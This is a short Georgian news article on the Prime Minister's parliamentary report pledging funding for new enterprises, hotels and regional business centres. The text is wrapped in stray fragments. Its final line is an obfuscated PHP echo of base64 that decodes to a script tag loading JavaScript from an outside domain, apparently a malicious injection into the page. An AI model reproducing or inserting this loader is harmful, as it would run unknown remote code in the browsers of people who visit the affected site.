celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის განცხადებით, მთავრობა ბიზნესის ეფექტიან და სწრაფ გაჯანსაღებას შეუწყობს ხელს.
 
ამის შესახებ პრემიერ-მინისტრმა პარლამენტში სამთავრობო პროგრამის მიმდინარეობის ანგარიშისა და ქვეყნის განვითარების ათწლიანი გეგმის წარდგენისას განაცხადა.
 
„მინდა ვთქვა, რომ განსაკუთრებული ზრუნვის საგანია ადგილობრივი წარმოების, მცირე და საშუალო ბიზნესის განვითარება. ჩვენი გეგმის მიხედვით, პროგრამის - „აწარმოე საქართველოში“ ფარგლებში დაფინანსდება 1300 ახალი საწარმო და 400 სასტუმრო, რომელთა ჯამური ინვესტიცია შეადგენს 6 მლრდ ლარს“, - განაცხადა მთავრობის მეთაურმა.
 
მისივე თქმით, მცირე და საშუალო ბიზნესის ტექნიკური მხარდაჭერის მიზნით, დაინერგება რეგიონული მხარდაჭერის მექანიზმი, რაც 10 რეგიონში ბიზნესცენტრების შექმნას გულისხმობს.
 
ამასთან, როგორც პრემიერმა სიტყვით გამოსვლისას აღნიშნა, მთავრობის ამოცანა უნდა იყოს, რაც შეიძლება მალე გაიზარდოს საერთაშორისო ინვესტორების რიცხვი ქვეყანაში.
1441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");